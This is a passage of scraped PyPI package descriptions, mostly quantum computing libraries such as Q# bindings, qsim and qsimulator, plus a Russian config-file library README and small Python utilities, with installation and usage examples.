\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438.\u042d\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 Python 3.7 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438.\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438:importosimportjsonimportloggingimportrequestsimportrandomfromqs_files.configsimportConfigs# \u041d\u0430\u0441\u0442\u0440\u043e\u0438\u043c \u043b\u043e\u0433\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043b\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439logging.basicConfig(filename='app.log',level=logging.INFO,format='%(asctime)s-%(levelname)s:%(message)s')# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0444\u0430\u0439\u043b\u043e\u043c .env/config.qsconfig=Configs('.env/config.qs')# \u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0438\u0437 \u0444\u0430\u0439\u043b\u0430config.load()# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0438\u0437 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438value=config.get_value('section_name','key_name')# \u0418\u0437\u043c\u0435\u043d\u044f\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044econfig.set_value('section_name','key_name','new_value')config.save()# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043d\u043e\u0432\u0443\u044e \u0441\u0435\u043a\u0446\u0438\u044e \u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 \u043d\u0435\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044fnew_section_data={'new_key_1':'value_1','new_key_2':'value_2'}config.set_section('new_section',new_section_data)# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u043d\u043e\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0432 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0443\u044e \u0441\u0435\u043a\u0446\u0438\u044econfig.add_value('existing_section','new_key','new_value')# \u0423\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0431\u044d\u043a\u0430\u043f\u043e\u0432config.set_backup_time(24)# \u0412\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f\u044bconfig.backup(enable=True)# \u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044econfig.save()# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u043a\u0446\u0438\u0438 'existing_section' \u043f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439section_data=config.get_section('existing_section')logging.info(f\"\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u043a\u0446\u0438\u0438 'existing_section':{section_data}\")# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c JSON-\u0444\u0430\u0439\u043b \u0441 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0438\u0437 \u0441\u0435\u043a\u0446\u0438\u0438json_data=json.dumps(section_data)withopen('config_data.json','w')asjson_file:json_file.write(json_data)# \u0412\u044b\u0432\u043e\u0434\u0438\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438file_list=os.listdir('.')logging.info(f\"\u0421\u043f\u0438\u0441\u043e\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438:{file_list}\")# \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c HTTP-\u0437\u0430\u043f\u0440\u043e\u0441 \u043a \u0441\u0430\u0439\u0442\u0443response=requests.get('https://jsonplaceholder.typicode.com/posts/1')ifresponse.status_code==200:post_data=response.json()logging.info(f\"\u0414\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430:{post_data}\")else:logging.error(f\"\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430:{response.status_code}\")# \u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0435 \u0447\u0438\u0441\u043b\u043e \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u0435\u0433\u043e \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438random_number=random.randint(1,100)config.set_value('random','random_number',str(random_number))config.save()\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0430GitHub.\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u041f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0439\u0442\u0435\u0441\u044c \u043a \u043d\u0430\u0448\u0435\u043c\u0443 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0443 \u043d\u0430Discord, \u0433\u0434\u0435 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0437\u0430\u0434\u0430\u0442\u044c \u0432\u043e\u043f\u0440\u043e\u0441\u044b, \u043e\u0431\u0441\u0443\u0434\u0438\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\u0412\u0435\u0431-\u0441\u0430\u0439\u0442\u041f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043f\u0440\u043e\u0435\u043a\u0442\u0430qs-files\u0434\u043b\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432.\u041b\u0438\u0446\u0435\u043d\u0437\u0438\u044f\u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0435\u043a\u0442 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 MIT. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0432 \u0444\u0430\u0439\u043b\u0435LICENSE.\u0410\u0432\u0442\u043e\u0440\u041f\u0440\u043e\u0435\u043a\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043dQuadrat.Ik.\u0421\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0441 \u043d\u0430\u043c\u0438\u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043d\u0435 \u0441\u0442\u0435\u0441\u043d\u044f\u0439\u0442\u0435\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0441 \u043d\u0430\u043c\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443quadrat.ik@yandex.com."} +{"package": "qsgen", "pacakge-description": "UNKNOWN"} +{"package": "qsh", "pacakge-description": "No description available on PyPI."} +{"package": "qshader", "pacakge-description": "Powerful shading support for PyQt5..#thread QTimer 10#pre_define hue 0#import PyQt5.QtGui QColor#begin_shaderColor1=QColor.fromHsv(hue,50,200)Color2=QColor.fromHsv((hue+30)%360,50,220)Color3=QColor.fromHsv((hue+60)%360,50,240)if@@UNDER_MOUSE:Gradient=f\"qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0{Color1.name()}, stop:{@@MOUSE_POSITION_WIDGET.x()/$$parent.width()}{Color2.name()}, stop:1{Color3.name()})\"else:Gradient=f\"qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0{Color1.name()}, stop:0.5{Color2.name()}, stop:1{Color3.name()})\"$$style(f\"background:{Gradient}; color: white; border: 0px solid; border-radius: 1px; font-size: 18px; padding: 15px;\")$$effect(BloomEffect,100,QColor.fromRgb(Color1.red(),Color2.green(),Color3.blue(),@@RGB_MAX))hue=(hue+1)%360#end_shader#thread QTimer 10#pre_define hue 0#import PyQt5.QtGui QColor#begin_shadercolor=QColor.fromHsv(hue,@@RGB_MAX,@@RGB_MAX)$$style(f'background-color:{color.name()}; color: black; border: 0px; font-size: 20px; padding: 30px;')$$effect(BloomEffect,250,color)$$parent.setText(color.name())hue=(hue+(2if@@UNDER_MOUSEelse1))%360#end_shaderWARNING: QShader is in ALPHA state, please be patient and report all bugs.QShader Documentation.QTS Documentation.QShader V1.0.0-ALPHA."} +{"package": "qsharp", "pacakge-description": "Q# Language Support for PythonQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharppackage for Python provides interoperability with the Q# interpreter, making it easy\nto simulate Q# programs within Python.InstallationTo install the Q# language package, run:pipinstallqsharpUsageFirst, import theqsharpmodule:importqsharpThen, use the%%qsharpcell magic to run Q# directly in Jupyter notebook cells:%%qsharp\n\nopen Microsoft.Quantum.Diagnostics;\n\n@EntryPoint()\noperation BellState() : Unit {\n use qs = Qubit[2];\n H(qs[0]);\n CNOT(qs[0], qs[1]);\n DumpMachine();\n ResetAll(qs);\n}\n\nBellState()SupportFor more information about the Azure Quantum Development Kit, visithttps://aka.ms/AQ/Documentation.ContributingQ# welcomes your contributions! Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-chemistry", "pacakge-description": "Q# Chemistry Library for PythonTheqsharp-chemistrypackage for Python provides interoperability with Microsoft Quantum Development Kit's Chemistry Library.For details on how to get started with Python and Q#, please see theGetting Started with Python guide.For details about the Quantum Chemistry Library, please see theIntroduction to the Quantum Chemistry Library articlein our online documentation.You can also try ourQuantum Computing Fundamentalslearning path to get familiar with the basic concepts of quantum computing, build quantum programs, and identify the kind of problems that can be solved.Installing with AnacondaIf you use Anaconda or Miniconda, installing theqsharppackage will automatically include all dependencies:condainstall-cquantum-engineeringqsharpInstalling from SourceIf you'd like to contribute to or experiment with the Python interoperability feature, it may be useful to install from source rather than from theqsharp-chemistrypackage on the Python Package Index (PyPI).\nTo do so, make sure that you are in thePython/qsharp-chemistrydirectory, and runsetup.pywith theinstallargument:cdPython/qsharp-chemistry\npythonsetup.pyinstallBuilding theqsharp-chemistryPackageThe Python interoperability feature uses a standardsetuptools-based packaging strategy.\nTo build a platform-independent wheel, run the setup script withbdist_wheelinstead:cdPython/qsharp-chemistry\npythonsetup.pybdist_wheelBy default, this will create aqsharp-chemistrywheel indist/with the version number set to 0.0.0.1.\nTo provide a more useful version number, set thePYTHON_VERSIONenvironment variable before runningsetup.py.Support and Q&AIf you have questions about the Quantum Development Kit and the Q# language, or if you encounter issues while using any of the components of the kit, you can reach out to the quantum team and the community of users inStack Overflowand inQuantum Computing Stack Exchangetagging your questions withq#."} +{"package": "qsharp-core", "pacakge-description": "Q# Interoperability for PythonTheqsharp-corepackage for Python provides interoperability with the Quantum Development Kit and with the Q# language, making it easy to simulate Q# operations and functions from within Python.For details on how to get started with Python and Q#, please see theGetting Started with Python guide.You can also try ourQuantum Computing Fundamentalslearning path to get familiar with the basic concepts of quantum computing, build quantum programs, and identify the kind of problems that can be solved.Installing with AnacondaIf you use Anaconda or Miniconda, installing theqsharppackage will automatically include all dependencies:condainstall-cquantum-engineeringqsharpInstalling from SourceIf you'd like to contribute to or experiment with the Python interoperability feature, it may be useful to install from source rather than from theqsharp-corepackage on the Python Package Index (PyPI).\nTo do so, make sure that you are in thePythondirectory, and runsetup.pywith theinstallargument:cdiqsharp/src/Python/\npythonsetup.pyinstallBuilding theqsharp-corePackageThe Python interoperability feature uses a standardsetuptools-based packaging strategy.\nTo build a platform-independent wheel, run the setup script withbdist_wheelinstead:cdiqsharp/src/Python/\npythonsetup.pybdist_wheelBy default, this will create aqsharp-corewheel indist/with the version number set to 0.0.0.1.\nTo provide a more useful version number, set thePYTHON_VERSIONenvironment variable before runningsetup.py.Support and Q&AIf you have questions about the Quantum Development Kit and the Q# language, or if you encounter issues while using any of the components of the kit, you can reach out to the quantum team and the community of users inStack Overflowand inQuantum Computing Stack Exchangetagging your questions withq#."} +{"package": "qsharp-jupyterlab", "pacakge-description": "Q# Language Support for JupyterLabQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharp-jupyterlabextension provides syntax highlighting for Q# documents and Q# notebook\ncells in JupyterLab.InstallationTo install the Q# JupyterLab extension, run:pipinstallqsharp-jupyterlabTo run Q# in Jupyter notebooks, remember to also install theqsharppackage: [https://pypi.org/project/qsharp].SupportFor more information about the Azure Quantum Development Kit, visithttps://aka.ms/AQ/Documentation.ContributingQ# welcomes your contributions! Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-lang", "pacakge-description": "Q# Language Support for PythonQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharp-langpackage for Python provides interoperability with the Q# interpreter, making it easy\nto simulate Q# programs within Python.InstallationTo install the Q# language package, run:pipinstallqsharp-langUsageFirst, import theqsharpmodule:importqsharpThen, use the%%qsharpcell magic to run Q# directly in Jupyter notebook cells:%%qsharp\n\nopen Microsoft.Quantum.Diagnostics;\n\n@EntryPoint()\noperation BellState() : Unit {\n use qs = Qubit[2];\n H(qs[0]);\n CNOT(qs[0], qs[1]);\n DumpMachine();\n ResetAll(qs);\n}\n\nBellState()SupportFor more documentation and to browse issues, please visit the Q# project wiki at [https://github.com/microsoft/qsharp/wiki].ContributingQ# welcomes your contributions! Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-preview", "pacakge-description": "Q# Python Bindings"} +{"package": "qsharp_python", "pacakge-description": "Q# Python Bindings"} +{"package": "qsharp-widgets", "pacakge-description": "No description available on PyPI."} +{"package": "qshell", "pacakge-description": "No description available on PyPI."} +{"package": "qsignal", "pacakge-description": "QSignal \u2013 A QT Signal/slot for pythonThis project provides easy to use Signal class for implementing Signal/Slot mechanism in Python.\nIt does not implement it strictly but rather creates the easy and simple alternative.ClassesSignalqsignal.Signalis the main class.To create a signal, just make asig = qsignal.Signaland set up an emitter of it. Or create it withsig = qsignal.Signal(emitter=foo).To emit it, just call yoursig().\nOr emit it in asynchronous mode with the methodasync.Example:>>> from qsignal import Signal>>> # Creating signal\n>>> sig = Signal()>>> # Or\n>>> myobject.signal = Signal(emitter=myobject)>>> # Connecting to signals\n>>> sig.connect(callback)\n>>> myobject.signal.connect(sig)\n>>> myobject.signal.connect(otherobject.callback_method)>>> # Emitting\n>>> sig()\n>>> myobject.signal('argument(s)', optional=True)>>> # Emitting in asynchronous mode\n>>> sig.async()To connect slots to it, pass callbacks intoconnect. The connections are maintained throughweakref, thus\nyou don\u2019t need to search for them and disconnect whenever you\u2019re up to destroy some object.SignallerThe base class for objects to maintain their Signals.The only purpose of this class is to automate Signal names and emitter references.>>> from qsignal import Signal, Signaller>>> # For example, this is a class...\n>>> class MyClass(Signaller):\n>>> my_signal = Signal()>>> # This is a slot...\n>>> def my_slot():\n>>> sig = Signal.emitted()\n>>> assert sig.name == my_signal\n>>> assert sig.emitter.__class__ == MyClass>>> # And the connections...\n>>> o = MyClass()\n>>> o.my_signal.connect(my_slot)\n>>> #...\n>>> o.my_signal()"} +{"package": "qsilver", "pacakge-description": "QSilverQSilver is a tiny python library, which provides api to run multiply tasks concurrent in only one thread using async/await syntax.InstallationYou can install QSilver via pip:pipintallqsilverUsageimportqsilverasyncdefexample():print(\"Hello\")awaitqsilver.sleep(1)print(\"World!\")qsilver.create_scheduler()qsilver.add_coroutine(example())qsilver.run_forever()LicenseMIT"} +{"package": "qsim", "pacakge-description": "QSimA simple simulator for quantum circuits."} +{"package": "qsimcirq", "pacakge-description": "qsim and qsimhQuantum circuit simulators qsim and qsimh. These simulators were used for cross\nentropy benchmarking in[1].[1], F. Arute et al,\n\"Quantum Supremacy Using a Programmable Superconducting Processor\",\nNature 574, 505, (2019).qsimqsim is a Schr\u00f6dinger full state-vector simulator. It computes all the2namplitudes of the state vector, wherenis the number of qubits.\nEssentially, the simulator performs matrix-vector multiplications repeatedly.\nOne matrix-vector multiplication corresponds to applying one gate.\nThe total runtime is proportional tog2n, wheregis the number of\n2-qubit gates. To speed up the simulator, we use gate fusion[2][3],\nsingle precision arithmetic, AVX/FMA instructions for vectorization and OpenMP\nfor multi-threading.[2]M. Smelyanskiy, N. P. Sawaya,\nA. Aspuru-Guzik, \"qHiPSTER: The Quantum High Performance Software Testing\nEnvironment\", arXiv:1601.07195 (2016).[3]T. H\u00e4ner, D. S. Steiger,\n\"0.5 Petabyte Simulation of a 45-Qubit Quantum Circuit\", arXiv:1704.01127\n(2017).qsimhqsimh is a hybrid Schr\u00f6dinger-Feynman simulator[4]. The lattice is split into two parts\nand the Schmidt decomposition is used to decompose 2-qubit gates on the\ncut. If the Schmidt rank of each gate ismand the number of gates on\nthe cut iskthen there aremkpaths. To simulate a circuit with\nfidelity one, one needs to simulate all themkpaths and sum the results.\nThe total runtime is proportional to(2n1+ 2n2)mk, wheren1andn2are the qubit numbers in the first and second parts. Path\nsimulations are independent of each other and can be trivially parallelized\nto run on supercomputers or in data centers. Note that one can run simulations\nwith fidelityF < 1just by summing over a fractionFof all the paths.A two level checkpointing scheme is used to improve performance. Say, there\narekgates on the cut. We split those into three parts:p+r+s=k, wherepis the number of \"prefix\" gates,ris the number of \"root\" gates andsis the number of \"suffix\" gates. The first checkpoint is executed after\napplying all the gates up to and including the prefix gates and the second\ncheckpoint is executed after applying all the gates up to and including the\nroot gates. The full summation over all the paths for the root and suffix gates\nis performed.Ifp>0then one such simulation givesF \u2248 m-p(for all the\nprefix gates having the same Schmidt rankm). One needs to runmpsimulations with different prefix paths and sum the results to getF = 1.[4]I. L. Markov, A. Fatima, S. V. Isakov,\nS. Boixo, \"Quantum Supremacy Is Both Closer and Farther than It Appears\",\narXiv:1807.10749 (2018).C++ UsageThe code is basically designed as a library. The user can modify sample\napplications inappsto meet their own needs. The usage of sample applications is described in thedocs.Input formatThe circuit input format is described in thedocs.NOTE: This format is deprecated, and no longer actively maintained.Sample CircuitsA number of sample circuits are provided incircuits.Unit testsUnit tests for C++ libraries use the Google test framework, and are\nlocated intests.\nPython tests use pytest, and are located inqsimcirq_tests.To build and run all tests, run:make run-testsThis will compile all test binaries to files with.xextensions, and run each\ntest in series. Testing will stop early if a test fails. It will also run tests\nof theqsimcirqpython interface. To run C++ or python tests only, runmake run-cxx-testsormake run-py-tests, respectively.To clean up generated test files, runmake cleanfrom the test directory.Cirq UsageCirqis a framework for modeling and\ninvoking Noisy Intermediate Scale Quantum (NISQ) circuits.To get started simulating Google Cirq circuits with qsim, see thetutorial.More detailed information about the qsim-Cirq API can be found in thedocs.DisclaimerThis is not an officially supported Google product.How to cite qsimQsim is uploaded to Zenodo automatically. Click on this badgeto see all the citation formats for all versions.An equivalent BibTex format reference is below for all the versions:@software{quantum_ai_team_and_collaborators_2020_4023103,\n author = {Quantum AI team and collaborators},\n title = {qsim},\n month = Sep,\n year = 2020,\n publisher = {Zenodo},\n doi = {10.5281/zenodo.4023103},\n url = {https://doi.org/10.5281/zenodo.4023103}\n}"} +{"package": "qsimov-cloud-client", "pacakge-description": "Unlock Quantum Potential with Neighborhood Quantum Superposition!\ud83c\udf0c Welcome to a new era of quantum computing! \ud83c\udf0cAre you ready to elevate your quantum algorithms to unprecedented heights? IntroducingNeighborhood Quantum Superpositiona cutting-edge service designed to revolutionize your quantum computations.What isNeighborhood Quantum Superposition?Neighborhood Quantum Superpositionis not just a service; it's a quantum leap into enhanced efficiency and performance. This groundbreaking offering provides a diverse range of superposition options, allowing you to tailor quantum states precisely to your algorithm's needs.Key Features:\ud83d\ude80Versatility:Choose from various superposition types to optimize your quantum computations.\ud83e\udde0Efficiency Boost:Achieve superior algorithmic performance with strategically crafted superpositions.\u2699\ufe0fFlexible Integration:Seamlessly integrateNeighborhood Quantum Superpositioninto your existing quantum workflows.\ud83c\udf10Cloud-Powered:Harness the power of quantum superposition conveniently through our cloud-based platform.How It Works:Neighborhood Quantum Superpositionleverages advanced quantum algorithms to generate highly efficient superposition states. Whether you're exploring optimization problems, simulating quantum systems, or running complex quantum circuits, this service empowers you to unlock the full potential of quantum computing. Here you can see a visual example!!Get Started Today with Qsimov Cloud Client!Qsimov Cloud Client is a tool designed to facilitate interaction with Qsimov'sNeighborhood Quantum Superpositionservices. This client allows you to connect to the company's services and leverage the capabilities ofNeighborhood Quantum Superpositionfor your quantum computing needs.InstallationTo install the Qsimov Python Client, use the following pip command:pipinstallqsimov-cloud-clientBasic Usagefromqsimov_cloud_clientimportQsimovCloudClient# Initialize QsimovCloudClient with your access tokenclient=QsimovCloudClient(\"your_access_token\")# Set parameters for the serviceclient.set_metric(\"ample\")client.set_state(state_bin='0111010')client.set_distances([\"0\",\"9/4\",\"inf\"])client.can_have_nan(False)client.set_ancilla_mode(\"clean\")# Generate a quantum circuitcircuit_superposition=client.generate_circuit()# Access the resultprint(\"The resulting circuit in qasm is:\",circuit_superposition.get_qasm_code())# Additional usage examples can be found in the documentation.Don't miss out on the quantum revolution! Enhance your algorithms with Neighborhood Quantum Superposition and experience the future of quantum computing today.Ready to elevate your quantum computations?Visit QSimov!\ud83d\ude80Neighborhood Quantum Superposition - Transforming Quantum Computing!\ud83d\ude80"} +{"package": "qsimov-Mowstyl", "pacakge-description": "QSimov is a quantum computer simulator based on the circuit model."} +{"package": "qsimulator", "pacakge-description": "1. QUICK START1.2\tTUTORIAL INTRODUCTION(see accompanying helloworld.py)\nLets start with a simple example of using qsim, something like a 'hello world' --import qsim\nqc = qsim.QSimulator(8)\nqc.qgate(qsim.H(),[0])\nqc.qgate(qsim.C(),[0,3])\nqc.qreport()\nqc.qmeasure([0])\nqc.qreport()When run, the above code generates the following output (since measuring randomly collapses to some state per its probability, there is 50% chance you might see the final state as 00000000) --State\n00000000\u00a0\u00a0\u00a0 0.70710678+0.00000000j\n00001001\u00a0\u00a0\u00a0 0.70710678+0.00000000j\n\nState\n00001001\u00a0\u00a0\u00a0 1.00000000+0.00000000jWith respect to the functionality, the above code starts with an 8-qubit system, and then sets up qubits 3 and 0 entangled in bell state |Phi+>. And then measures qubit 0. This is depicted in the diagram below --7 -------------------------\n6 -------------------------\n5 -------------------------\n4 -------------------------\n3 -----O-------------------\n2 -----|-------------------\n1 -----|-------------------\n0 -[H]-.-(/)---------------(Using (/) to depict the measurement operation.)The output emitted by the above code is the dump of the state right after the setting up of the |Phi+> state, and then after measuring the qubit 0.Lets go line by line to understand the code --import qsimThis first line imports the qsim. Fairly straight forward.qc = qsim.QSimulator(8)The main class in qsim is QSimulator. This line creates an instance of that class. As a convention in this document, qc is always used to represent an instance of the class QSimulator. The QSimulator class instance, qc, represents a quantum computer. The number 8 as the argument to the constructor of class QSimulator, specifies the number of qubits in that quantum computer.qc.qgate(qsim.H(),[0])qgate() is the function that applies a quantum gate on a given set of qubits in the system. In the above line of code, it applies the hadamard gate (H()), to qubit 0. See the documentation below for the gates available.qc.qgate(qsim.C(),[0,3])Here a CNOT gate (C()) is applied on bits 0 and 3, with qubit 0 being the control qubit. In QSimulator the C gate is defined to take the first qubit as the control qubit.qc.qreport()The function qreport() outputs the current superposition state. The first batch of lines is that output.qc.qmeasure([0])The qmeasure() function measures qubit 0.qc.qreport()This last qreport() function call outputs the state after the measurement of the qubit 0.\n\u00a0\nNow, let us run the same code with trace turned on (therefore removed the qreport() calls). Turning trace ON, it outputs the state after init and each gate and measurement steps (see accompanying helloworld_traceON.py) --import qsim\nfrom qgates import *\nqc = qsim.QSimulator(8, qtrace=True)\nqc.qgate(qsim.H(),[0])\nqc.qgate(qsim.C(),[0,3])\nqc.qmeasure([0])and, here is its output --Initial State\n00000000 1.00000000+0.00000000j\n\nHADAMARD Qubit[0]\n00000000 0.70710678+0.00000000j\n00000001 0.70710678+0.00000000j\n\nCNOT Qubit[0, 3]\n00000000 0.70710678+0.00000000j\n00001001 0.70710678+0.00000000j\n\nMEASURED Qubit[0] = [0] with probality = 0.5\n00000000 1.00000000+0.00000000j1.2\tPROGRAMMING MODELqsim assumes a programming model as shown below.Users write the algorithms on a front-end classical computer using standard programming language (Python), and qsim provides an API to access and perform operations on a Quantum Computer as a back-end resource.+--------------------+ +----------------+\n | +---| | |\n +-------+ | | q | | |\n | | | Classical | s | | Quantum |\n | |--------| Computer | i |----------| Computer |\n +-------+ | (Front-end) | m | | (Back-end) |\n / / | | | | |\n --------- | +---| | |\n +--------------------+ +----------------+2. CORE FUNCTIONS2.1qc = qsim.QSimulator(nqubits, ncbits=None, initstate=None, prepqubits=None, qtrace=False, qzeros=False, validation=False, visualize=False)First argument specifies the number of qubits in the system. If ncbits is provided it specifies the number of classical bits, if not provide, it defaults to same as the number of qubits. If neither initstate or prepqubits is provided, prepares all qubits to |0>.Argument 'prepqubits' can be provided to initialize the initial state by providing the states of all individual qubits in the system. The structure to use is a list, example [[a,b],[c,d], ... [x,y]]. Note that [a,b] is the MSB.Argument 'initstate' can be used to pass an initial state as a numpy.matrix of shape (2**nqubits,1). Also, the initstate should have the amplitudes normalized. See accompanying initialize-state.py for an example. Creating an initstate vector requires more involed coding, but can come in handy when the initial state is required to have very custom distribution of amplitudes - e.g., in case of trying to setup the initial state for testing QFT.If 'initstate' is provided, any provided 'prepqubits' is ignored.If qtrace=True, it causes each gate and measurement operation to emit the resulting state.If qzeros=True, prints even those whose amplitude is 0.If validation=True, every qgate() call validates the gate to be unitaryIf visualize=True, the qreport() displays an additional bar graph showing the magnitude of the amplitudes of each state.2.2qc.qreset()Brings the simulator to the same state as after QSimulator() call - initial state, qtrace, qzeros, ... everything.2.3qc.qgate(gate_function, list_of_qubits, qtrace=False)qgate() is used to perform quantum gate operations on a set of qubits.There are a number of gates pre-created within the qgates module, and additional gates can be defined by the users (see Section USER DEFINED GATE below). If a gate operates on more than 1 qubit (e.g., CNOT gate, SWAP gate, etc.) then the list in the second argument (list_of_qubits) must contain that many qubits.The function qgate() validates the number of bits passed in list_of_qubits against the number of qubits required for the gate, if not correct, throws an exception.If qtrace is True, the resulting state is printed out.2.4qc.qmeasure(qbit_list, cbit_list=None, qtrace=False)Returns the measured values of the qubits in the qubit_list, each 0 or 1, as a list, in the same order as the qubits in the qubit_list. 